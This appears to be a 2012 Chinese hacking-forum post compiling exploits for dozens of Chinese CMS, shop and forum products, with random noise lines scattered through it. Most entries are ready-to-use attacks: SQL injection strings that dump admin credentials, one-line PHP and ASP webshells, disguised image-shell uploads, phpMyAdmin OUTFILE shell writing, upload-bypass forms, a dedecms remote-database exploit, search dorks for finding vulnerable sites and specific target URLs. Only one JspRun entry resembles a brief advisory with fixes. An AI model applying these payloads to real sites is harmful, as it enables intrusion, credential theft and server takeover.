中国网络渗透测试联盟
标题:
0day合集
[打印本页]
作者:
admin
时间:
2012-9-13 16:58
标题:
0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
. {3 L: p( {0 D& X" o, |$ r( _/ ^! E
0 H' q1 `# Y: b2 a9 n
直接上exploit:
0 b5 e& |# n' q( y) `+ W
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
6 l' }3 K# r9 Z( q$ R, q
test:
http://www.tb11.net/system/xitong/shownews.asp?id=210
7 ?) o. P/ a% R6 G$ m0 I5 m' n1 o
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 q# _' a. p1 o
Asprain论坛 注册用户 上传图片就可拿到webshell
) N" r5 e h/ ?9 Q4 ?
3 J9 ]8 G, s: R0 s9 G
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
# a6 _8 J& H+ `- V; T! P( e4 Q
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
- H+ A4 j3 N5 _0 r
2.gif 为一小图片文件,一定要小,比如qq表情图片
. A7 T% O* M# i
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
. o* `- W# N6 B4 {9 f
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
6 T. n) U% `: b0 B% a! G
5.q.asp;.gif
# M" @# b0 F# W/ E
google:Powered by Asprain
! L" N9 B: v! {
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! u$ l- o2 C9 [) |
. {; |2 u- ?, p1 f0 ^$ Y( ^
ShopNum1全部系统存在上传漏洞。
; M/ ^+ @# v. _8 {5 F0 U
1 B* C8 {' d5 v- ^) s* B
首先 在
http://www.shopnum1.com/product.html
页面查看任意产品详细说明。
0 ]" E: ~0 \8 W( J4 W
按说明 提示登录后台。。
7 L: W) S+ l. F5 Q6 q
在后台功能页面->附件管理->附件列表
. ~! I" q' U6 l8 W \" ~
可以直接上传.aspx 后缀木马
- O6 u. W4 X& I% {
http://demo.shopnum1.com/upload/20110720083822500.aspx
* v( G. {; w+ t! S
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& U2 f5 m7 t- y/ N4 O G
2 }& j( n5 [( [% q3 J
牛牛CMS中小企业网站管理系统 上传漏洞
q( H! p( C5 j
* B K' _0 I4 v: W7 d
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
9 w& H1 t. D" T
后台:admin/login.asp
1 ]5 @* t7 K4 p4 d
ewebeditor 5.5 Nday
' R; j4 v4 l/ w9 _+ u
exp:
( h1 J+ [4 B8 S" P
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
, |" q9 f( ]3 U
<input?type=file?name=uploadfile?size=100><br><br>?
) B" Q- ~' H3 S* U J9 v4 d
<input?type=submit?value=upload>?
& [+ |/ R1 r& [
</form>
+ P U v3 ~- ^) e
ps:先上传小马.
( H0 `" f/ E7 r. w/ B7 m
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
' s* F1 X% e* Z. n1 ^
9 L9 J: I0 {/ z1 n
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ [, b: c5 ?7 B
& r, S, h+ U' P. _
YothCMS 遍历目录漏洞
! j, [6 V: F' h2 i) F0 r
+ {: \4 K9 H1 c9 U: y
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
" b; O) `4 a. `( y) D
默认后台:admin/login.asp
3 M% r4 _8 q- v3 `+ q" U" Y
遍历目录:
5 I! z B$ O' B% {* b
ewebeditor/manage/upload.asp?id=1&dir=../
+ a9 C8 e* O% w) t3 H- m& q
data:
7 q. \& c) l& ^/ t7 f
http://www.flycn.net/%23da%23ta%23
\%23db_%23data%23%23.asa
6 V' y2 R o9 t; N6 T! k$ @
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- Z$ A& W1 ^: O: f9 \/ H, e
) O. D4 `9 {3 u! l- z* w8 o, j
Net112企业建站系统 1.0
5 G% T7 h* T( E+ K' M3 y
3 }8 f' _7 V. T7 P+ T2 p
源码简介:
4 L4 {$ D# h9 J# g! f
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
: j' ? g; ]# p$ z# _3 h7 \7 v
添加管理员:
1 b* n, A, j/ j2 O
http://www.0855.tv/admin/admin.asp?action=add&level=2
3 B/ A1 Q9 J/ k1 a* P* e6 |, C
其实加不加都不是很重要,后台文件都没怎么作验证。
0 y2 | k8 r. z/ C: [
上传路径:
+ x. |, e3 ]- y6 b. u1 A, ?
http://www.0855.tv/inc/Upfile.as
... 0&ImgHeight=200
3 r" ^% D1 \: b, T
http://www.0855.tv/inc/Upfile.asp?Stype=2
$ o3 l q' _$ k/ I }, p
怎么利用自己研究。
4 H/ F' d9 K, ^ v" m- p4 O
遍历目录:
0 N9 e. s: ~2 ?2 C0 l; Q
http://www.0855.tv/admin/upfile.asp?path=../..
4 }9 s& y% m$ _% P' e
如:
0 L& k* j, ~# R' n* A& F0 P7 f
http://www.0855.tv/admin/upfile.asp?path=../admin
2 O' H, D# N2 J7 Z
http://www.0855.tv/admin/upfile.asp?path=../data
# r% Z1 V: C$ S9 ]4 M' ^7 I, M7 X
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ D, z, J8 `" o7 W* W$ r0 X
' D$ }5 v/ s% s' L2 [. ^) }2 i
易和阳光购物商城通杀 上传漏洞
: J/ B+ e7 S" M
0 ]" h6 ~7 |% @: o! ~2 W/ a
前提要求是IIS6.0+asp坏境。
7 q2 i8 }3 Y; Z m
漏洞文件Iheeo_upfile.asp
7 ^/ }) d- H& I$ o
过滤不严.直接可以iis6.0上传
* h3 O6 @# N' _4 Y6 L
把ASP木马改成0855.asp;1.gif
/ F5 @/ G' R* q! \# F/ N
直接放到明小子上传
! z9 n) b$ C/ r
Google搜索:inurl:product.asp?Iheeoid=
, {: z' F) Z: {) d% U
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 ~+ o7 p0 q4 i6 v7 `
/ x& w! b9 N7 j8 _. M
phpmyadmin后台4种拿shell方法
; F3 h. q1 \, F7 O6 a2 S1 H( M( `
1 |/ g- M+ f' w# i
方法一:
, j5 a' q- t! P8 c, S% J6 a$ {2 Y
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
1 f7 e0 q2 t; l" Y% {" s
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
3 S/ N6 i) s) y
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
8 ], {; u9 E4 Z
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
1 Y6 J1 O3 V+ M' K) U* ?& ~
一句话连接密码:xiaoma
! x% R" W8 c- K0 }$ U A5 }
方法二:
& K0 I" T2 \- w7 J2 j
Create TABLE xiaoma (xiaoma1 text NOT NULL);
1 ]5 g% ^0 r- M2 ]1 ~2 }+ Z
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
4 Q- \& Q. i4 c3 |
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
& X" C5 f/ F) u E2 W3 s/ }
Drop TABLE IF EXISTS xiaoma;
/ l% z) A7 m) o- X1 ~4 W/ W' `6 b
方法三:
0 Q' u. Z8 o, o8 c' ~6 m
读取文件内容: select load_file('E:/xamp/www/s.php');
6 |- ?7 t/ a$ z) J
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
' ^0 G; J: v( w+ h5 t9 M
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
; t! F5 Y7 t- N, K, i( y
方法四:
, M3 F( y) q+ i. h, d3 I8 j+ W
select load_file('E:/xamp/www/xiaoma.php');
) j- p- W7 E7 ?7 j, T
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
- A; S! c: q6 R! e% d% I
然后访问网站目录:
http://www.xxxx.com/xiaoma.php?cmd=dir
- j% Z; q [1 T+ [9 z2 ?
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- s) A. E5 z( [8 \7 P
5 {3 O7 y- F: v! o% B
传信网络独立开发网站源码0day漏洞
# v4 ^3 I7 |- G+ u* X2 f. W
; W& w; L; f/ v) Q, o
后台system/login.asp
9 g' w* l3 \9 E
进了后台有个ewebeditor
; Q6 S n: `: Z; _, }; X: l
Google 搜索inurl:product1.asp?tyc=
( e* |4 s' i1 K; v0 E
编辑器漏洞默认后台ubbcode/admin_login.asp
: G% _1 _, E1 K; E
数据库ubbcode/db/ewebeditor.mdb
/ j- P8 P9 j# d5 V6 w9 }+ v
默认账号密码yzm 111111
3 v/ T1 ^- i; R0 h# t
- i) j+ _( G& x# U: {
拿webshell方法
; l/ r3 d7 w( d4 T" H" V3 T
登陆后台点击“样式管理”-选择新增样式
% S$ }4 O* p2 g" Q) s3 Z) }
样式名称:scriptkiddies 随便写
7 t0 \% ?7 l) }( J) u% U& g
路径模式:选择绝对路径
& z7 t- S- F/ x( G
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
- c7 B- e5 Z4 M' Z- o2 Z
图片类型比如就是我们要上传的ASP木马格式
! ?! I* A% U/ a$ d0 x6 G( S
上传路径:/
* w6 g+ r, g* e( [6 p
图片限制:写上1000 免的上不了我们的asp木马
" {+ v& S# W- I" ~ n% Z" u
上传内容不要写
# R! S6 |8 F% d1 |
可以提交了
1 e5 S. f) X6 h! k
样式增加成功!
& h" q7 V. }5 ~( ]4 I$ A1 b
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
8 m! {+ L. q, C/ O; }$ \
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
* _6 K/ k2 B1 K9 ?) j4 E
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
" X+ X) W, u3 X) f5 |
上ASP木马 回车 等到路径
9 z( e j8 H/ H# t; O# i
4 g9 ?9 ~: ~1 L& O" p
后台:system/login.asp
% Z" ?" J! z% p$ T0 W
Exp:
1 [6 p3 q8 f6 Q! f, w
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
$ _# k- H7 a1 q- u' Y5 t% l
测试:
# Q; o( ~- t1 _0 C x1 a
http://www.zjgaoneng.com/product_show.asp?id=9
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
`' O+ j9 n3 j. B8 k6 c
http://www.yaerli.com/product_show.asp?id=245
union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
/ A) i0 c3 _; A* s7 E
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 @% U' {; r8 V0 g
2 W3 @/ k4 L; L& t- R
foosun 0day 最新注入漏洞
* J3 a- a! H, k7 @- w. f6 b
' S$ b+ _3 C/ |5 M, n& M
漏洞文件:
www.xxx.com/user/SetNextOptions.asp
; P" L: u0 `( f3 {7 A. j0 n) O
利用简单的方法:
H6 c4 O; p5 ]' \4 y! m
暴管理员帐号:
, o& y y+ I0 B
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
0 f' v- n; }" y- L; j
暴管理员密码:
2 g1 V5 f+ q. H
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_pass_word,
& G m4 G! B( _9 ]
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: U7 u9 J9 N0 H- o
8 ~( f( B, d! T' c- o% q! k) R0 c
网站程序的版权未知!
5 b( ?9 g( M1 e% U& [$ ?
$ }8 b3 g# r: }1 [
默认网站数据库:
* B/ [+ S1 h+ c
www.i0day.com/data/nxnews.mdb
7 P( R7 L' c: N, U$ D; O1 W: {' @
ewebeditor 在线编辑器:
6 V( v$ y* n9 [( d9 w' v# O: O" J. K
编辑器数据库下载地址:
www.i0day.com/ewebeditor/db/ewebeditor.mdb
3 f7 l$ \+ ~* G) g0 N- f2 R
登录地址:ewebeditor/admin_login.asp
9 K4 C& x. a. S9 k- E
默认密码:admin admin
0 |: D) o0 T" {% ^
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
" Q& d* F6 }' |+ y
! z( U. V# \2 d" b- f( t- _
Sql注入漏洞:
( W4 Y% C! B h. F' ?" \
http://www.i0day.com/detail.asp?id=12
( C/ K/ M$ l" M& X7 `0 ~; a; `
exp:
) v3 q f; h; N8 e: K0 K# P
union select 1,admin,password,4,5,6,7,8 from admin
- ?# v' G$ q: F: p
爆出明文帐号/密码
2 Z. M, k$ k0 D$ S' W1 o
7 }3 x s2 S, T! L( v5 p
上传漏洞:
7 q. U' k; L! }# H: o/ B
后台+upfile.asp
5 o% F; i$ f; M. A( K, Z+ s% f
如:
) I! D' \4 _# n! Z' W
http://www.i0day.com/manage/upfile.asp
可以用工具。如明小子。
0 B. N5 c+ g ^$ g: b, I
shell的地址:网址+后台+成功上传的马
. j7 q0 o# n0 x# p6 z6 E3 {
google:inurl:news.asp?lanmuName=
7 ^* Q' i( n' U4 ^' G) p( i: h
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 \: c+ `: h9 b, ~# a( Y
7 n0 x* k4 u5 P" t# A4 o
dedecms最新0day利用不进后台直接拿WEBSHELL
! {8 k4 |6 z5 t' N1 i* I5 d* x
2 E6 i1 |, N+ W, G& u
拿webshell的方法如下:
n5 M4 M) ~) M) Y t
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
/ E# a) h: h7 J# N
前题条件,必须准备好自己的dede数据库,然后插入数据:
; j9 f- @3 h( y) w
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
0 N: R, h z/ `( A4 {3 q1 j$ ?
& N/ S# J( O. Z$ p" x. z
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
) J! j* i4 B8 h
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
9 l" U: C: A- Y/ a) Y+ u
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
# s/ T8 |# M, y" A0 ?
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
$ c- `+ S6 X" @% {! x0 F1 G0 |; F0 o
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
, C. \* V2 M8 P8 O- y3 d- V
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
+ m: t5 s8 |( k
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
3 w9 E. X% q! A9 l
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
! e. V4 x8 V- U2 e* n' a
<input type="text" value="true" name="nocache" style="width:400">
+ l2 G4 k$ _: M2 f
<input type="submit" value="提交" name="QuickSearchBtn"><br />
) Z" w1 j& I4 ^7 @# X( ?
</form>
9 n" U3 Y$ `3 N7 C- M
<script>
) I. i% M8 l/ S* {- E$ j4 W
function addaction()
& X8 P* @0 |" R% j
{
9 {+ j. V1 ?( D) Y: T8 @6 F. q! Z
document.QuickSearch.action=document.QuickSearch.doaction.value;
, U6 n3 G3 n: q' T5 R. r
}
5 D# D* r" o# U, m& M# U$ o: @& y
</script>
9 r1 `" X+ e: a [
-----------------------------------------------------------------------------------------------------------------------------------------------
; i& |0 P/ ]: B9 q/ ?& r3 s- x6 D
. F: H2 m) [9 o2 Z6 h5 N
dedecms织梦暴最新严重0day漏洞
8 k& W" ^& T y+ v
bug被利用步骤如下:
3 V9 x/ P) ?5 i) \" K+ v9 N+ J! x7 ?+ }7 L
http://www.2cto.com
/网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
( H) n) l) q* w D( B
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
# H! J- y7 t* U1 m2 o4 n L7 E. T% M
-------------------------------------------------------------------------------------------------------------------------------------------
/ \8 n* Y* ]# C/ ^3 ?0 d2 i
# M# C" Y6 C- _0 I ~
多多淘宝客程序上传漏洞
. m& P& S5 V' `$ R' @7 B
漏洞页面:
" R$ M- N! d7 ]2 i: u5 |4 M& u
admin\upload_pic.php
. o+ }# ?6 p1 X) P
传送门:
2 v/ a/ U/ ^6 V0 Z# `7 _7 O- N; f0 m
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
! n- i Z0 g4 n1 Z2 ^, r/ s
PS:copy张图片马 直接 xxx.php 上传抓包地址!
a0 e9 t: ~: h3 _
------------------------------------------------------------------------------------------------------------------------------------------------------
5 p9 d* `5 R3 p( y8 E2 I' `
" z! ?! i8 j$ V7 ` Y+ C2 e( Y
无忧公司系统ASP专业版后台上传漏洞
@& k3 {% W. m$ }
漏洞文件 后台上传
\7 u5 M' M9 w3 g6 K$ F: k7 V
admin/uploadPic.asp
6 a' t4 E0 C5 h* ]* G Y1 M; @3 j
漏洞利用 这个漏洞好像是雷池的
9 |/ S/ z" s& q7 T
http://forum.huc08.com/admin/upl
... ptkiddies.asp;& upload_code=ok&editImageNum=1
! |2 ?. M; j9 P7 L5 R, \* D! F
等到的webshell路径:
* x& y" }; `3 Z! I
/UploadFiles/scriptkiddies.asp;_2.gif
$ E+ L8 y1 u6 X9 i
---------------------------------------------------------------------------------------------------------------------------------------------------
9 w; O! X* m" M& [1 Q# P
1 s+ }( ~) q1 h& G0 Q; g& x' `
住哪酒店分销联盟系统2010
& L$ B3 u& |' G+ r( @
Search:
+ c/ |9 E* | j5 v' |
inurl:index.php?m=hotelinfo
p+ B, i2 K: ]5 |8 V( ]
http://forum.huc08.com
/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
$ B, c0 a9 I U0 @1 ]/ C* @, N
默认后台:index.php?m=admin/login
5 ^8 f9 I! e% f6 K5 Z
--------------------------------------------------------------------------------------------------------------------------------------------------
* g/ B2 _" n3 d8 m; a p
% c+ F5 Q% R+ Q; D0 X, }
inurl:info_Print.asp?ArticleID=
% d- P5 ?; N ~! e( I9 N
后台 ad_login.asp
- \9 l1 C/ _$ S3 j
爆管理员密码:
- X7 E( w' ], Z' d8 Z% y+ F
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
4 Q: j& W- ^) V+ o9 m
------------------------------------------------------------------------------------------------------------------------------------------------------------
/ }; i' C3 j. o
$ u2 l. ?3 @/ l4 o
搜索框漏洞!
+ v. o) i$ e2 o' q
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
$ t" \' u+ i8 Z l0 b
--------------------------------------------------------------------------------------------------------------------------------------------------------
2 O. v: S9 l% \, `" _
! L+ a a' |% X+ v! H: n
关键字:
' U9 s/ _* `+ W9 f; e8 f
inurl:/reg_TemletSel.asp?step=2
5 `6 Q( W. w5 W% t" _* u
或者
6 R9 l4 Y: \1 u, X7 ^7 f& }
电子商务自助建站--您理想的助手
/ B$ B+ N; U. q& x3 {
-------------------------------------------------------------------------------------------------------------------------------------------------
/ V4 d, `$ R. }% V" N0 U
) l3 W# w" \) c$ n
iGiveTest 2.1.0注入漏洞
; t' _6 P+ o; O3 \- \& _1 l
Version: <= 2.1.0
' x0 u& [6 X) J
# Homepage:
http://iGiveTest.com/
7 n& O; I0 z' e0 |6 E# y
谷歌关键字: “Powered by iGiveTest”
; z! a" L. G2 {2 K9 n- c
随便注册一个帐号。然后暴管理员帐号和密码
- P' z7 V# _2 D7 u9 c
http://www.xxxx.com/users.php?ac
... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
8 ]7 K9 H! J( A9 {* p0 o* q
------------------------------------------------------------------------------------------------------------------------------------------------
/ M6 }8 T) ~! @/ n/ c
g& ~9 M: D2 P0 h0 p
CKXP网上书店注入漏洞
. }* _- P2 m {0 P
工具加表:shop_admin 加字段:admin
, ~& P- q5 J. B' \, q7 L& f
后台:admin/login.asp
4 Q V- i* M% f2 C6 u
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
& v' R* L. @5 O& t: |
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
( g8 Y* @: z4 V6 x. y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ ^: m% Q& Q" D+ k W: o
/ g! W5 f+ S; l
段富超个人网站系统留言本写马漏洞
0 y' _6 G3 j) O' `" z+ Z4 K) z
源码下载:
http://www.mycodes.net/24/2149.htm
. P. ^* m" e/ z. F% c
addgbook.asp 提交一句话。
6 ~0 m" K/ j" n4 S* I
连接:
http://www.xxxx.tv/date/date3f.asp
! o I, Y+ O. A& M' F% i9 K% O8 }
google:为防批量,特略!
( n+ h4 t8 q, U$ {
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 L( ]; h* ~* @2 s2 P+ R- n
$ J$ g' n: w [2 E
智有道专业旅游系统v1.0 注入及列目录漏洞
" o. V: g$ f- {7 S0 M- v
默认后台路径:/admin/login.asp
" t6 R" [1 I. }+ D" q3 l
默认管理员:admin
: Z/ y5 Z3 n. `
默认密码:123456
" a) B$ o. s) g7 r5 }
SQL EXP Tset:
$ r, y6 Q: x; f" `
http://www.untnt.com/info/show.asp?id=90
union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
/ H/ c) Q _' u! s
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' D' F# `5 ^" y* ]9 ?- g j
, W, K3 ~9 a$ e; N& P* V6 |: f
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
# K- g. g- J- y& Z* \ t O5 i
EXP:
3 y% \1 x z" G/ d+ T
<title>eWebeditoR3.8 for php任意文件上EXP</title>
7 g2 R- ]* v* b2 o3 b) b. l7 w
<form action="" method=post enctype="multip
- l2 J" ~( Q8 ~- w$ z
art/form-data">
3 z# `) c3 R$ ~! j8 o- O( A: ?
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
$ V5 U |6 s- ^: W' r
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
6 m9 v6 b1 n! `) Z8 V& Y+ A
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
* B: `& F9 Y- H3 G# c- X! d
file:<input type=file name="uploadfile"><br>
3 s) O V8 B+ |' H- |1 b
<input type=button value=submit onclick=fsubmit()>
( ^( L2 } Z, Y4 M4 e9 Z
</form><br>
Y( |9 s- `( B, T) ^+ ?
<script>
0 @2 ^0 j" L7 g+ U* O
function fsubmit(){
# |* `+ K( u' o/ a( w0 R
form = document.forms[0];
0 U) a$ @: G( o
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
( R: u. A E$ ?' [- v+ L5 {/ G
alert(form.action);
1 Z! K: W4 Z9 n# w- K/ {
form.submit();
3 [0 d5 h5 ]) |+ Y6 e' x3 R
}
9 P) z9 |; K5 T* J: {. j7 M4 g
</script>
* |8 O {1 j0 K- s4 G u
注意修改里面ewebeditor的名称还有路径。
) [8 e( b5 T+ ` i5 z0 a( X- H: V
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 _7 N. M5 f5 x7 z5 Z! H: ?
# |) J, O/ y, W) m8 _# {
提交’时提示ip被记录 防注入系统的利用
( Y5 c5 e. o$ f' |/ I
网址:
http://www.xxx.com/newslist.asp?id=122
′
8 n2 g- }/ m8 h
提示“你的操作已被记录!”等信息。
7 Q3 t+ v% V- Z2 {
利用方法:
www.xxx.com/sqlin.asp
看是否存在,存在提交
http://www.xxx.com/newslist.asp?id=122
‘excute(request("TNT"))写入一句话。
$ i. P" W. C2 H8 x' Z8 z/ D
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( v8 w2 Q6 r0 X
* _' u0 u8 f: ~
西部商务网站管理系统 批量拿shell-0day
# C A0 h3 e/ |7 U* q
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
' ]1 ]8 f3 x* m
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
' T, X/ N x( e$ B* b
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
" u h- P2 ?: P8 o5 H$ g
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
9 F, H8 z4 b5 z2 p+ L/ r @! B- V
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& B- G* v; _8 {( H" [
- x- g, n+ y5 k
JspRun!6.0 论坛管理后台注入漏洞
p5 p, j. x8 r$ _) }# o
8 `2 _) p% u' Z0 s0 L- f
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
. B& W2 F% y4 L- K @
JspRun!6.0
* m5 x: Z+ e. a' e5 p
漏洞描述:
* Y0 [' X. j S) W+ W
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
- c& }6 \: y7 u w
在处理后台提交的文件中ForumManageAction.java第1940行
, U& D1 L7 C' s3 l5 o1 W% P3 L
String export = request.getParameter("export");//直接获取,没有安全过滤
4 y+ N/ s D! c8 f# K
if(export!=null){
0 A* {! [+ R& C- {/ M& [8 B4 P
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
* y0 v6 p! t0 @9 T
if(styles==null||styles.size()==0){
! C2 C' k: H* h) M% W
<*参考
$ ~7 `# S7 q2 V2 n# O/ c1 m+ j
nuanfan@gmail.com
" h$ _7 |: O c+ `) V+ c
*> SEBUG安全建议:
' _3 a5 B& T& D9 Y: A( ~9 {2 M1 ~
www.jsprun.net
`7 C. z" k+ B# R; ~
(1)安全过滤变量export
( |# T4 I0 O0 I) j% l5 B+ M
(2)在查询语句中使用占位符
T- Q+ _1 `7 P3 \
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 O. S) n1 J6 |: Q
s9 {; B7 S# o. X* g* Y
乌邦图企业网站系统 cookies 注入
- ^( B m0 Z x, Z$ f
/ T/ D8 i( i% V- G- P
程序完整登陆后台:/admin/login.asp
. q; }9 g9 v4 Q5 L {
默认登陆帐号:admin 密码:admin888
/ p3 p7 z. D! K' [+ S
语句:(前面加个空格)
% I. p0 C$ u7 a+ j" ]7 y
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
) Z6 |! i9 h1 i; F; C& v
或者是16个字段:
# B1 }7 f( P( P5 B
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
4 H% h- c. S2 o. {) _
爆不出来自己猜字段。
- f1 U3 X7 f8 J# y0 A# ~
注入点:
http://www.untnt.com/shownews.asp?=88
4 h2 {5 Q8 B2 O4 J) y$ {
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
) X7 U+ i3 T+ y
关键字:
! v1 m d. W5 N+ v+ D
inurl:shownews?asp.id=
0 L$ F- \' j7 B+ N% C/ r+ Q
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 ^0 k# U$ R! L* R( M/ ?( e% s
c! P0 M8 M* ]
CKXP网上书店注入漏洞
, p c' ?0 D! M& p
" _( M' K0 `; g) v
工具加表:shop_admin 加字段:admin
7 Y! P4 Y$ R% y6 h H% Q, L' i+ G+ a- \
后台:admin/login.asp
: C: T; C/ Q7 T% y: {$ r' l5 c
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
" c% `2 d! M" ]3 k; L- ?2 ?
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
8 x6 y3 o K( l) f
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
